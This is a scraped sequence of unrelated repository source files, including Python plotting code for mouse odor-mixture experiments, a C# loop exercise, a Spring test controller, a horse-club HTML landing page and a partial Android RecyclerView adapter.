mean_l = float(left) / float(totalr)
scatter_m = ax.scatter([pea_c], [mean_l], color=colors[mode], marker='.', s=200, alpha=.9, label=mode)
# calculate,plot binomial confidence intervals
confint = binomial_CI(left, totalr)
c = confint[1] - confint[0]
c0 = confint[0] + c / 2
errb = ax.errorbar([pea_c], [c0], yerr=c / 2, linestyle='None', color=colors[mode], alpha=.6)
errb[-1][0].set_linestyle('--')
if mode == 'odor':
x.append(float(pea_c))
if not probe_curve:
if 'stim' in mode:
continue
curvedict[mode][0].append(float(pea_c))
curvedict[mode][1].append(float(totalr))
curvedict[mode][2].append(float(left))
# find curve fit
if curve:
p_chris = [.5, 3.5, .01, 0.0]
for mode in curvedict.keys():
fdata = [
np.array(curvedict[mode][0]),
np.array(curvedict[mode][2]),
np.array(curvedict[mode][1])
]
fit = find_fit(p_chris, fdata)
if fit.success:
x1 = np.arange(0., 1.01, 0.01)
p = fit.x
ax.plot(x1, weibull_chris(x1, p), alpha=.5, color=colors[mode])
handles, labels = plt.gca().get_legend_handles_labels()
by_label = OrderedDict(zip(labels, handles))
ax.legend(by_label.values(), by_label.keys(), loc='lower right')
ax.set_title(mouse)
ax.set_xlim(0, 1.0)
x.append(0.0)
x.append(1.0)
ax.set_xticks([x0 for x0 in x])
ax.set_yticks([y for y in np.arange(0.0, 1.1, 0.1)])
ax.set_ylim(0, 1.05)
ax.set_xlabel('% PEA in PEA/IPA', fontsize=12)
ax.set_ylabel('% responds like PEA', fontsize=12)
sns.despine()
sns.despine(left=True)
plt.savefig('MixtureAnalysis_{0}_{1}.pdf'.format(self.name, mouse), format='pdf', dpi=1200)
plt.savefig('MixtureAnalysis_{0}_{1}.png'.format(self.name, mouse), dpi=300)
plots.append(fig)
plt.show()
print 'Total # trials:', totalt
return plots
def plot_av(self, curve=True, probe=True, multiple_c=False, probe_curve=False, scatter=False):
avdata = ddict(lambda: np.array([0, 0, 0]))
for mouse in self.mouse_data.keys():
for date in self.mouse_data[mouse].keys():
for r in self.mouse_data[mouse][date].keys():
avdata[r] += np.array(self.mouse_data[mouse][date][r])
colors = {'odor + T3 stim': 'r', 'odor + T4 stim': 'g', 'odor': 'b', 'odor 1.5-fold': 'c'}
totalt = 0
x = []
fig, ax = plt.subplots(figsize=(10, 8))
curvedict = ddict(lambda: [[], [], []])
for stim, result in sorted(avdata.items()):
mix = stim.split('_')
if len(mix) < 3:
mode = 'odor'
elif mix[2] == '1.5':
mode = 'odor 1.5-fold'
elif probe:
if 'T' in mix[2]:
mode = 'odor + {0} stim'.format(mix[2])
else:
continue
else:
continue
pea_c = round(float(stim.split('_')[0]) * 0.01, 2)
performance = []
[l, r, s] = result
total = l + r + s
totalt += l + r + s
subtotal = l + r
# plot mean
mean_l = float(l) / float(subtotal)
scatter_m = ax.scatter([pea_c], [mean_l], color=colors[mode], marker='.', s=200, alpha=.9, label=mode)
# calculate,plot binomial confidence intervals
confint = binomial_CI(l, total)
c = confint[1] - confint[0]
c0 = confint[0] + c / 2
errb = ax.errorbar([pea_c], [c0], yerr=c / 2, linestyle='None', color=colors[mode], alpha=.6)
errb[-1][0].set_linestyle('--')
if mode == 'odor':
x.append(float(pea_c))
if not probe_curve:
if 'stim' in mode:
continue
curvedict[mode][0].append(float(pea_c))
curvedict[mode][1].append(float(subtotal))
curvedict[mode][2].append(float(l))
# find curve fit
p_chris = [.5, 3.5, .01, 0.0]
for mode in curvedict.keys():
fdata = [
np.array(curvedict[mode][0]),
np.array(curvedict[mode][2]),
np.array(curvedict[mode][1])
]
fit = find_fit(p_chris, fdata)
if fit.success:
x1 = np.arange(0., 1.01, 0.01)
p = fit.x
ax.plot(x1, weibull_chris(x1, p), alpha=.5, color=colors[mode])
handles, labels = plt.gca().get_legend_handles_labels()
by_label = OrderedDict(zip(labels, handles))
ax.legend(by_label.values(), by_label.keys(), loc='lower right')
ax.set_title('Average')
ax.set_xlim(0, 1.0)
x.append(0.0)
x.append(1.0)
ax.set_xticks([x0 for x0 in x])
ax.set_yticks([y for y in np.arange(0.0, 1.1, 0.1)])
ax.set_ylim(0, 1.05)
ax.set_xlabel('% PEA in PEA/IPA', fontsize=12)
ax.set_ylabel('% responds like PEA', fontsize=12)
sns.despine()
sns.despine(left=True)
plt.savefig('MixtureAnalysis_{0}_{1}.pdf'.format(self.name, 'average'), format='pdf', dpi=1200)
plt.savefig('MixtureAnalysis_{0}_{1}.png'.format(self.name, 'average'), dpi=300)
plt.show()
print 'Total # trials:', totalt
def plot_accp(self, mice=[]):
plots = []
for mouse, sessions in sorted(self.mouse_data.items()):
if not mouse in mice:
continue
fuckyoudict = ddict(list)
for session in sorted(sessions):
for stim, result in self.mouse_data[mouse][session].items():
fuckyoudict[stim].append(result)
pdict = ddict(list)
for stim, result in fuckyoudict.items():
totalr = 0
silent = 0
left = 0
for [l, r, s] in result:
mix = stim.split('_')
if len(mix) < 3:
mode = 'odor'
else:
mode = 'odor + {0} stim'.format(mix[2])
pea_c = round(float(stim.split('_')[0]) * 0.01, 2)
totalr += l + r
silent += s
left += l
if not mode == 'odor':
pdict[stim].append([float(l) / float(l + r), float(left) / float(totalr)])
nrows, ncols = 2, 2
fig = plt.figure(figsize=(12, 9))
stims = sorted([s for s in pdict.keys()])
for i in range(len(stims)):
ax = fig.add_subplot(nrows, ncols, i + 1)
ax.plot(range(len(sessions)), [x[0] for x in pdict[stims[i]]], alpha=.5)
ax.plot(range(len(sessions)), [x[1] for x in pdict[stims[i]]])
ax.set_xticklabels(sorted(sessions))
ax.set_yticks([y for y in np.arange(0.0, 1.1, 0.1)])
ax.set_ylim(0, 1.05)
ax.set_title(stims[i])
fig.tight_layout()
plots.append(fig)
plt.show()
return plots
def calc_stats(self):
for mouse, sessions in sorted(self.mouse_data.items()):
for session in sorted(sessions):
total = 0
for stim, result in self.mouse_data[mouse][session].items():
total += sum(result)
print mouse, session, 'Total # trials:', total
pass
<file_sep>/roipy.py
'''
Basic image processing functions for processing ROI images
Copyright E.Chong & J.Kappel 2017
'''
import pickle as p
import cv2
import os
import numpy as np
import matplotlib.pyplot as plt
import zipfile
def mask_image(img):
path = 'C:/voyeur_rig_config/PolygonMask.png'
assert os.path.exists(path), 'No PolygonMask.png in voyeur_rig_config!'
maskimg = cv2.imread(path)
maskimg = cv2.cvtColor(maskimg, cv2.COLOR_BGR2GRAY)
y, x = np.where(maskimg == 255)
mask = {'dx_start': x.min(),
'dx_stop': x.max(),
'dy_start': y.min(),
'dy_stop': y.max()
}
return img[mask['dy_start']:mask['dy_stop'],
mask['dx_start']:mask['dx_stop']]
pass
def create_projection(img, imgname, imgsource, bmp=False):
matrixpath = 'C:/voyeur_rig_config/Matrix.pkl'
assert os.path.exists(matrixpath), 'No Matrix.pkl in cwd!'
matrix = open((matrixpath), 'rb')
CAM2DMD = p.load(matrix)
img = mask_image(img)
warpimg = cv2.warpPerspective(img, CAM2DMD, (684, 608), borderMode=1, borderValue=1)
# switch rows and columns
warpimg = np.transpose(warpimg)
print 'Transforming image: {0}'.format(imgname)
for y, row in enumerate(warpimg):
for x, value in enumerate(row):
if not value in [0, 255]:
warpimg[y][x] = 255
if bmp:
cv2.imwrite(os.path.join(imgsource, 'transformed_{0}.bmp'.format(imgname.split('.')[0])), warpimg)
cv2.imwrite(os.path.join(imgsource, 'transformed_{0}.png'.format(imgname.split('.')[0])), warpimg)
pass
def shift_frame(img,rowshift, colshift):
### shifting rows and columns to move spots into FOS ###
width, height = img.shape
print 'Rows shifted: {0}. Columns shifted: {1}.'.format(rowshift, colshift)
img = np.insert(img, height, np.zeros((rowshift, width)), axis=0)
img = np.insert(img, 0, np.zeros((colshift, height + rowshift)), axis=1)
img = img[rowshift:height + rowshift, 0:width] * (2 ** 16)
return img
def transform_masks(mouse, date, rowshift=0, colshift=0):
path = 'C:/VoyeurData/{0}/spots/{1}'.format(mouse, date)
refimg = False
assert os.path.exists(path), 'Path for {0} does not exist!'.format(mouse)
for imgname in os.listdir(path):
if imgname.startswith('ref'):
refimg = True
img = plt.imread(os.path.join(path, imgname))
img = shift_frame(img,rowshift,colshift)
img = img.astype('uint16')
cv2.imwrite(os.path.join(path, 'shifted_{0}.png'.format(imgname.split('.')[0])), img)
elif imgname.startswith('Mask'):
img = plt.imread(os.path.join(path, imgname))
assert len(img.shape) == 2, 'Data format not 2-dimensional!'
assert len( np.unique( img ) ) == 2, 'Data format not binary!'
img = shift_frame(img,rowshift,colshift)
create_projection(img, imgname, path)
else:
continue
if not refimg:
print 'WARNING: No reference image was shifted!'
pass
def read_roi(fileobj):
if fileobj[:4] != 'Iout':
raise IOError('Magic number not found')
y1 = ord(fileobj[9:10])
x1 = ord(fileobj[11:12])
y2 = ord(fileobj[13:14])
x2 = ord(fileobj[15:16])
frame = np.zeros(256**2)
frame = frame.reshape(256, 256)
frame[y1:y2, x1:x2] = 255
return frame
def create_masks(mouse, date, transform=True):
path = 'C:/VoyeurData/{0}/spots/{1}'.format(mouse, date)
zf = zipfile.ZipFile(os.path.join(path,'RoiSet.zip'))
for roi in zf.namelist():
rfile = zf.open(roi, 'r')
fileobj = rfile.read()
frame = read_roi(fileobj)
cv2.imwrite(os.path.join(path, 'Mask_{0}.png'.format(roi[:3])), frame.astype('uint8'))
if transform:
create_projection(frame, 'Mask_{0}.png'.format(roi[:3]), path)
pass | 8e1aaa42154c65ada471a035d9acbcf769833016 | [
"Python"
] | 3 | Python | johannesmaxkappel/iospy | 390c96b88b05b265a6e3400949ccd07e2ddd5e22 | d761d11dc450b2321384cd34f22e55ba22555dd3 |
refs/heads/main | <file_sep>using System;
namespace Donguler
{
class Program
{
static void Main(string[] args)
{
string ilkUrun = "<NAME>";
string ikinciUrun = "Krem";
string uçuncuUrun = "Tablo";
string[] Urunler = new string[] {
ilkUrun, ikinciUrun, uçuncuUrun
};
int i;
for (i = 0; i < Urunler.Length; i++)
{
Console.WriteLine(Urunler[i]);
}
Console.WriteLine("\nWhile döngüsüne göre listelenmesi:");
int a = 0;
while (a < Urunler.Length)
{
Console.WriteLine(Urunler[a]);
a++;
}
//Farkların anlaşılması açısından farklı ürünler kullanacağım foreach'te.
Console.WriteLine("\nForeach döngüsüne göre listelenmesi:");
Product urun1 = new Product();
urun1.adi = "kalem";
urun1.marka = "FaberCastell";
urun1.fiyat = 30;
Product urun2 = new Product();
urun2.adi = "Defter";
urun2.marka = "Mopak";
urun2.fiyat = 15;
Product[] urunler = new Product[] { urun1, urun2 };
foreach (var urun in urunler)
{
Console.WriteLine(urun1.adi + " " + urun1.marka + " " + urun1.fiyat + " " + urun2.adi + " " + urun2.marka + " " + urun2.fiyat);
} //Burada ürünlerin özelliklerini yani adını,markasını,fiyatını yazar.
}
class Product
{
public int fiyat { get; set; }
public string adi { get; set; }
public string marka { get; set; }
}
}
}
| 85a398aa1a6a58df32bc1a93ab23aee63c53c2b9 | [
"C#"
] | 1 | C# | SaraAkman/My_works | 1950f0c741aa2001ac0c89591907f7aa758bc3e5 | c297514f1b415ca6f14f15ff05f0c0f9e6e89c98 |
refs/heads/master | <repo_name>EstebanVillarreal/pruebasV-git<file_sep>/programa.php
<?php
print "<NAME>"
?> | ed41f7bca43c97bdfd50617d7798c411c2d7e1d9 | [
"PHP"
] | 1 | PHP | EstebanVillarreal/pruebasV-git | 137cd5994d6498713f7b69e8774cc4a1fddbb544 | 4cc552524eef7763f8844fc81628972476d34d93 |
refs/heads/master | <repo_name>xucyy/life<file_sep>/README.md
# life
我的学习记录生活
<file_sep>/src/main/java/com/xucy/life/controller/TestController.java
package com.xucy.life.controller;
import org.springframework.web.bind.annotation.RequestMapping;
import org.springframework.web.bind.annotation.RestController;
/**
* @Author xucy
* @Date 2019-09-03 17:07
* @Description
**/
@RestController
@RequestMapping("/testCon")
public class TestController {
@RequestMapping("/test")
public String test(){
return "成功1122";
}
}
| 25ddc5e1ab6d1e7e451b83672c606bdfa8409d7b | [
"Markdown",
"Java"
] | 2 | Markdown | xucyy/life | 3fdcc8e4ae43f90a28d7360f9bc3e11a77406bd1 | 588570425217b82bd7b44f12465bf7c63ec5f4b3 |
refs/heads/master | <repo_name>ColdShadows/Hello_World<file_sep>/Hello_World/Program.cs
//states the libraries used in this program
using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;
using System.Threading.Tasks;
//creates namespace called "Hello_World" for the program and all of its classes
namespace Hello_World
{
//creates a new class called "Program"
class Program
{
//main function for the class
static void Main(string[] args)
{
//creates a string variable to first and last name, and assigns a value to each
//string firstName = "Travis";
//string lastName = "Kean";
string firstName = null;
string lastName = null;
//Prompts the user to enter both first and last name
Console.WriteLine("Enter your first name");
firstName = Console.ReadLine();
Console.WriteLine("Good job, now enter your last name");
lastName = Console.ReadLine();
Console.WriteLine();
//displays output for 2 seperate lines for different orders of the first and last name, seperated by a comma
Console.WriteLine(firstName + ", " + lastName + "\n");
Console.WriteLine(lastName + ", " + firstName + "\n" );
//Writes the string inside to a command line
Console.WriteLine("Hello World " + firstName + " " + lastName);
//Allows the entering of a string, and finishes after pressing the new line carriage return.
Console.ReadLine();
}
}
}
| 5f866419bd050d51648ba54b698fa65a07f06c9a | [
"C#"
] | 1 | C# | ColdShadows/Hello_World | f3640a4fa3c931909d3f18461452cc871788dfda | c4c522e2989f96b15156a6d3010b69c6a052d384 |
refs/heads/master | <file_sep> <!DOCTYPE html>
<html lang="zxx" class="no-js">
<head>
<!-- Mobile Specific Meta -->
<meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
<!-- Favicon-->
<link rel="shortcut icon" href="img/fav.png">
<!-- Author Meta -->
<meta name="author" content="codepixer">
<!-- Meta Description -->
<meta name="description" content="">
<!-- Meta Keyword -->
<meta name="keywords" content="">
<!-- meta character set -->
<meta charset="UTF-8">
<!-- Site Title -->
<title>Horse Club</title>
<link rel="stylesheet" href="css/linearicons.css">
<link rel="stylesheet" href="css/font-awesome.min.css">
<link rel="stylesheet" href="css/bootstrap.css">
<link rel="stylesheet" href="css/magnific-popup.css">
<link rel="stylesheet" href="css/nice-select.css">
<link rel="stylesheet" href="css/animate.min.css">
<link rel="stylesheet" href="css/owl.carousel.css">
<link rel="stylesheet" href="css/main.css">
</head>
<body>
<?php include "header.php" ?>
<!-- start banner Area -->
<section class="banner-area relative" id="home">
<div class="overlay overlay-bg"></div>
<div class="container">
<div class="row fullscreen d-flex align-items-center justify-content-start">
<div class="banner-content col-lg-12">
<h6>Introducing Horse Club</h6>
<span class="bar"></span>
<h1 class="text-white">
						The Interrelation <br>
						Between Horse &amp; Rider
</h1>
<a href="#" class="genric-btn">Book Consultancy</a>
</div>
</div>
</div>
</section>
<!-- End banner Area -->
<!-- Start about-video Area -->
<section class="about-video-area section-gap">
<div class="container">
<div class="row">
<div class="col-lg-6 about-video-left">
<h6 class="text-uppercase">Brand new app to blow your mind</h6>
<h1>
We’ve made a life <br>
that will change you
</h1>
<p>
							<span>We are here to listen to you and deliver excellence</span>
</p>
<p>
							Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua.
</p>
<a class="primary-btn" href="#">Get Started Now</a>
</div>
<div class="col-lg-6 about-video-right justify-content-center align-items-center d-flex">
<a class="play-btn" href="https://www.youtube.com/watch?v=ARA0AxrnHdM"><img class="img-fluid mx-auto" src="img/play.png" alt=""></a>
</div>
</div>
</div>
</section>
<!-- End about-video Area -->
<!-- Start feature Area -->
<section class="feature-area relative pt-100 pb-20">
<div class="overlay overlay-bg"></div>
<div class="container">
<div class="row align-items-center justify-content-center">
<div class="col-lg-4 col-md-6">
<div class="single-feature">
<a href="#"><h4 class="text-white">Expert Technicians</h4></a>
<p>
Usage of the Internet is becoming more common due to rapid advancement of technology and power.
</p>
</div>
</div>
<div class="col-lg-4 col-md-6">
<div class="single-feature">
<a href="#"><h4 class="text-white">Professional Service</h4></a>
<p>
Usage of the Internet is becoming more common due to rapid advancement of technology and power.
</p>
</div>
</div>
<div class="col-lg-4 col-md-6">
<div class="single-feature">
<a href="#"><h4 class="text-white">Great Support</h4></a>
<p>
Usage of the Internet is becoming more common due to rapid advancement of technology and power.
</p>
</div>
</div>
<div class="col-lg-4 col-md-6">
<div class="single-feature">
<a href="#"><h4 class="text-white">Technical Skills</h4></a>
<p>
Usage of the Internet is becoming more common due to rapid advancement of technology and power.
</p>
</div>
</div>
<div class="col-lg-4 col-md-6">
<div class="single-feature">
							<a href="#"><h4 class="text-white">Highly Recommended</h4></a>
<p>
Usage of the Internet is becoming more common due to rapid advancement of technology and power.
</p>
</div>
</div>
<div class="col-lg-4 col-md-6">
<div class="single-feature">
<a href="#"><h4 class="text-white">Positive Reviews</h4></a>
<p>
Usage of the Internet is becoming more common due to rapid advancement of technology and power.
</p>
</div>
</div>
</div>
</div>
</section>
<!-- End feature Area -->
<!-- Start home-about Area -->
<section class="home-about-area section-gap">
<div class="container">
<div class="row">
<div class="col-lg-6 home-about-left">
<img class="mx-auto d-block img-fluid" src="img/about-img.png" alt="">
</div>
<div class="col-lg-6 home-about-right">
<h6 class="text-uppercase">Brand new app to blow your mind</h6>
<h1>We’ve made a life <br>
that will change you</h1>
<p>
							<span>We are here to listen to you and deliver excellence</span>
</p>
<p>
Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat. Duis aute irure dolor in reprehenderit in voluptate velit esse cillum dolore eu fugiat nulla pariatur. Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit anim id est laborum. Sed ut perspiciatis unde omnis.
</p>
<a class="primary-btn" href="#">Get Started Now</a>
</div>
</div>
</div>
</section>
<!-- End home-about Area -->
<!-- Start price Area -->
<section class="price-area section-gap">
<div class="container">
<div class="row d-flex justify-content-center">
<div class="menu-content pb-70 col-lg-8">
<div class="title text-center">
<h1 class="mb-10">Choose the best plan that suits you</h1>
						<p>For those who are extremely in love with an eco-friendly system.</p>
</div>
</div>
</div>
<div class="row">
<div class="col-lg-3 col-md-6">
<div class="single-price">
<div class="top-part">
<h1 class="package-no">01</h1>
<h4>Basic</h4>
<p>For the individuals</p>
</div>
<div class="package-list">
<ul>
<li>Secure Online Transfer</li>
<li>Unlimited Styles for interface</li>
<li>Reliable Customer Service</li>
</ul>
</div>
<div class="bottom-part">
<h1>£199.00</h1>
<a class="price-btn text-uppercase" href="#">Purchase</a>
</div>
</div>
</div>
<div class="col-lg-3 col-md-6">
<div class="single-price">
<div class="top-part">
<h1 class="package-no">02</h1>
<h4>Economy</h4>
<p>For the individuals</p>
</div>
<div class="package-list">
<ul>
<li>Secure Online Transfer</li>
<li>Unlimited Styles for interface</li>
<li>Reliable Customer Service</li>
</ul>
</div>
<div class="bottom-part">
<h1>£299.00</h1>
<a class="price-btn text-uppercase" href="#">Purchase</a>
</div>
</div>
</div>
<div class="col-lg-3 col-md-6">
<div class="single-price">
<div class="top-part">
<h1 class="package-no">03</h1>
<h4>Premium</h4>
<p>For the individuals</p>
</div>
<div class="package-list">
<ul>
<li>Secure Online Transfer</li>
<li>Unlimited Styles for interface</li>
<li>Reliable Customer Service</li>
</ul>
</div>
<div class="bottom-part">
<h1>£399.00</h1>
<a class="price-btn text-uppercase" href="#">Purchase</a>
</div>
</div>
</div>
<div class="col-lg-3 col-md-6">
<div class="single-price">
<div class="top-part">
<h1 class="package-no">04</h1>
<h4>Enterprise</h4>
<p>For the individuals</p>
</div>
<div class="package-list">
<ul>
<li>Secure Online Transfer</li>
<li>Unlimited Styles for interface</li>
<li>Reliable Customer Service</li>
</ul>
</div>
<div class="bottom-part">
<h1>£499.00</h1>
<a class="price-btn text-uppercase" href="#">Purchase</a>
</div>
</div>
</div>
</div>
</div>
</section>
<!-- End price Area -->
<!-- Start booking Area -->
<section class="booking-area section-gap relative" id="consultancy">
<div class="overlay overlay-bg"></div>
<div class="container">
<div class="row justify-content-between align-items-center">
<div class="col-lg-6 col-md-6 booking-left">
<div class="active-review-carusel">
<div class="single-carusel">
<img src="img/r1.png" alt="">
<div class="title justify-content-start d-flex">
<h4><NAME></h4>
<div class="star">
<span class="fa fa-star checked"></span>
<span class="fa fa-star checked"></span>
<span class="fa fa-star checked"></span>
<span class="fa fa-star"></span>
<span class="fa fa-star"></span>
</div>
</div>
<p>
Accessories Here you can find the best computer accessory for your laptop, monitor, printer, scanner, speaker. Here you can find the best computer accessory for your laptop, monitor, printer, scanner, speaker.
</p>
<img src="img/r2.png" alt="">
<div class="title justify-content-start d-flex">
<h4><NAME></h4>
<div class="star">
<span class="fa fa-star checked"></span>
<span class="fa fa-star checked"></span>
<span class="fa fa-star checked"></span>
<span class="fa fa-star"></span>
<span class="fa fa-star"></span>
</div>
</div>
<p>
Accessories Here you can find the best computer accessory for your laptop, monitor, printer, scanner, speaker. Here you can find the best computer accessory for your laptop, monitor, printer, scanner, speaker.
</p>
</div>
<!-- Review carousel slide: two customer testimonials (avatar image, reviewer
     name placeholder, 3-of-5 star rating, quote). -->
<div class="single-carusel">
  <img src="img/r1.png" alt="">
  <div class="title justify-content-start d-flex">
    <h4><NAME></h4>
    <div class="star">
      <!-- three filled + two empty stars = 3/5 rating -->
      <span class="fa fa-star checked"></span>
      <span class="fa fa-star checked"></span>
      <span class="fa fa-star checked"></span>
      <span class="fa fa-star"></span>
      <span class="fa fa-star"></span>
    </div>
  </div>
  <p>
    Accessories Here you can find the best computer accessory for your laptop, monitor, printer, scanner, speaker. Here you can find the best computer accessory for your laptop, monitor, printer, scanner, speaker.
  </p>
  <img src="img/r2.png" alt="">
  <div class="title justify-content-start d-flex">
    <h4><NAME></h4>
    <div class="star">
      <span class="fa fa-star checked"></span>
      <span class="fa fa-star checked"></span>
      <span class="fa fa-star checked"></span>
      <span class="fa fa-star"></span>
      <span class="fa fa-star"></span>
    </div>
  </div>
  <p>
    Accessories Here you can find the best computer accessory for your laptop, monitor, printer, scanner, speaker. Here you can find the best computer accessory for your laptop, monitor, printer, scanner, speaker.
  </p>
</div>
<!-- Duplicate slide with the same placeholder content, used to fill the
     carousel loop. -->
<div class="single-carusel">
  <img src="img/r1.png" alt="">
  <div class="title justify-content-start d-flex">
    <h4><NAME></h4>
    <div class="star">
      <span class="fa fa-star checked"></span>
      <span class="fa fa-star checked"></span>
      <span class="fa fa-star checked"></span>
      <span class="fa fa-star"></span>
      <span class="fa fa-star"></span>
    </div>
  </div>
  <p>
    Accessories Here you can find the best computer accessory for your laptop, monitor, printer, scanner, speaker. Here you can find the best computer accessory for your laptop, monitor, printer, scanner, speaker.
  </p>
  <img src="img/r2.png" alt="">
  <div class="title justify-content-start d-flex">
    <h4><NAME></h4>
    <div class="star">
      <span class="fa fa-star checked"></span>
      <span class="fa fa-star checked"></span>
      <span class="fa fa-star checked"></span>
      <span class="fa fa-star"></span>
      <span class="fa fa-star"></span>
    </div>
  </div>
  <p>
    Accessories Here you can find the best computer accessory for your laptop, monitor, printer, scanner, speaker. Here you can find the best computer accessory for your laptop, monitor, printer, scanner, speaker.
  </p>
</div>
</div>
</div>
<!-- Appointment form column. Note: the datepicker input previously carried
     two id attributes (id="datepicker" and id="exampleAmount"), which is
     invalid HTML; only the id the datepicker script binds to is kept. -->
<div class="col-lg-4 col-md-6 booking-right">
  <h4 class="mb-20">Appointment Form</h4>
  <form action="#">
    <input class="form-control" type="text" name="name" placeholder="Your name" required>
    <input class="form-control" type="email" name="email" placeholder="Email Address" required>
    <input class="form-control" type="text" name="phone" placeholder="Phone Number" required>
    <div class="input-group dates-wrap">
      <input id="datepicker" class="dates form-control" placeholder="Date &amp; time" type="text">
      <div class="input-group-prepend">
        <span class="input-group-text"><span class="lnr lnr-calendar-full"></span></span>
      </div>
    </div>
    <!-- Placeholder spelling fixed ("Messege" -> "Message"), including the
         onblur handler that restores it. -->
    <textarea class="common-textarea form-control mt-10" name="message" placeholder="Message" onfocus="this.placeholder = ''" onblur="this.placeholder = 'Message'"></textarea>
    <button class="btn btn-default btn-lg btn-block text-center">Book Now!</button>
  </form>
</div>
</div>
</div>
</section>
<!-- End booking Area -->
<!-- Start latest-blog Area -->
<!-- Latest-blog section: centered heading row followed by two blog cards
     (image, tag list, linked title, excerpt, post date). -->
<section class="latest-blog-area section-gap" id="blog">
  <div class="container">
    <div class="row d-flex justify-content-center">
      <div class="menu-content pb-60 col-lg-8">
        <div class="title text-center">
          <h1 class="mb-10">Latest News from our Blog</h1>
          <p>Who are in extremely love with eco friendly system.</p>
        </div>
      </div>
    </div>
    <div class="row">
      <!-- Blog card 1 -->
      <div class="col-lg-6 single-blog">
        <img class="img-fluid" src="img/b1.jpg" alt="">
        <ul class="tags">
          <li><a href="#">Travel</a></li>
          <li><a href="#">Life style</a></li>
        </ul>
        <a href="#"><h4>Portable latest Fashion for young women</h4></a>
        <p>
          Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore.
        </p>
        <p class="post-date">31st January, 2018</p>
      </div>
      <!-- Blog card 2 (same placeholder copy, different image) -->
      <div class="col-lg-6 single-blog">
        <img class="img-fluid" src="img/b2.jpg" alt="">
        <ul class="tags">
          <li><a href="#">Travel</a></li>
          <li><a href="#">Life style</a></li>
        </ul>
        <a href="#"><h4>Portable latest Fashion for young women</h4></a>
        <p>
          Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore.
        </p>
        <p class="post-date">31st January, 2018</p>
      </div>
    </div>
  </div>
</section>
<!-- End latest-blog Area -->
<!-- Start gallery Area -->
<!-- Full-width image gallery: six identical carousel items (g1..g6), each a
     thumbnail with an (empty) centered overlay container. -->
<section class="gallery-area">
  <div class="container-fluid">
    <div class="row no-padding">
      <div class="active-gallery">
        <div class="item single-gallery">
          <div class="thumb">
            <img src="img/g1.jpg" alt="">
            <div class="align-items-center justify-content-center d-flex">
            </div>
          </div>
        </div>
        <div class="item single-gallery">
          <div class="thumb">
            <img src="img/g2.jpg" alt="">
            <div class="align-items-center justify-content-center d-flex">
            </div>
          </div>
        </div>
        <div class="item single-gallery">
          <div class="thumb">
            <img src="img/g3.jpg" alt="">
            <div class="align-items-center justify-content-center d-flex">
            </div>
          </div>
        </div>
        <div class="item single-gallery">
          <div class="thumb">
            <img src="img/g4.jpg" alt="">
            <div class="align-items-center justify-content-center d-flex">
            </div>
          </div>
        </div>
        <div class="item single-gallery">
          <div class="thumb">
            <img src="img/g5.jpg" alt="">
            <div class="align-items-center justify-content-center d-flex">
            </div>
          </div>
        </div>
        <div class="item single-gallery">
          <div class="thumb">
            <img src="img/g6.jpg" alt="">
            <div class="align-items-center justify-content-center d-flex">
            </div>
          </div>
        </div>
      </div>
    </div>
  </div>
</section>
<!-- End gallery Area -->
<!-- start footer Area -->
<?php include "footer.php" ?>
<!-- End footer Area -->
<script src="js/vendor/jquery-2.2.4.min.js"></script>
<!-- <script src="https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.12.9/umd/popper.min.js" integrity="<KEY>" crossorigin="anonymous"></script> -->
<script src="js/vendor/bootstrap.min.js"></script>
<!-- <script type="text/javascript" src="https://maps.googleapis.com/maps/api/js?key=AIzaSyBhOdIF3Y9382fqJYt5I_sswSrEw5eihAA"></script> -->
<script src="js/easing.min.js"></script>
<script src="js/hoverIntent.js"></script>
<script src="js/superfish.min.js"></script>
<script src="js/jquery.ajaxchimp.min.js"></script>
<script src="js/jquery.magnific-popup.min.js"></script>
<script src="js/owl.carousel.min.js"></script>
<script src="js/jquery.sticky.js"></script>
<script src="js/jquery.nice-select.min.js"></script>
<script src="js/parallax.min.js"></script>
<script src="js/waypoints.min.js"></script>
<script src="js/jquery.counterup.min.js"></script>
<script src="js/mail-script.js"></script>
<script src="js/main.js"></script>
</body>
</html>
| be44487177c3078e23890a20e53bfb71763ef2bb | [
"PHP"
] | 1 | PHP | krkunal29/horceclub | 112b8a5bff6014e2cf4385523c88e3bfe59922d7 | 45f7dd159af76cfb2775f869f7c07e9651195091 |
refs/heads/master | <file_sep>rootProject.name='Corona Dashboard'
include ':app'
<file_sep>package com.coronadashboard.adapters;
import android.annotation.SuppressLint;
import android.content.Context;
import android.graphics.Typeface;
import android.view.LayoutInflater;
import android.view.View;
import android.view.ViewGroup;
import android.widget.TextView;
import androidx.annotation.NonNull;
import androidx.recyclerview.widget.RecyclerView;
import com.coronadashboard.R;
import com.coronadashboard.model.Country;
import com.coronadashboard.model.DashboardData;
import java.util.ArrayList;
import java.util.List;
/**
 * RecyclerView adapter that renders one row per country showing its total
 * confirmed cases, deaths and recoveries.
 */
public class CountryWiseDataAdapter extends RecyclerView.Adapter<CountryWiseDataAdapter.MyViewHolder> {

    private final Context context;
    private final List<Country> listData;

    /**
     * @param context  used to inflate the row layout
     * @param listData country rows to display; a null list is treated as empty
     */
    public CountryWiseDataAdapter(Context context, List<Country> listData){
        this.context = context;
        this.listData = listData != null ? listData : new ArrayList<Country>();
    }

    @NonNull
    @Override
    public CountryWiseDataAdapter.MyViewHolder onCreateViewHolder(@NonNull ViewGroup parent, int viewType) {
        View itemView = LayoutInflater.from(context).inflate(R.layout.itemview_country, parent, false);
        return new MyViewHolder(itemView);
    }

    @SuppressLint("SetTextI18n")
    @Override
    public void onBindViewHolder(@NonNull CountryWiseDataAdapter.MyViewHolder holder, int position) {
        Country currentData = listData.get(position);
        // Bind unconditionally: RecyclerView reuses holders, so the previous
        // code (which skipped rows whose confirmed count was 0) left stale
        // text from the previously bound country in recycled views.
        holder.textViewCountry.setText(currentData.getCountry());
        // String.valueOf avoids an NPE if a count is null (prints "null" instead).
        holder.textViewTotalCases.setText(String.valueOf(currentData.getTotalConfirmed()));
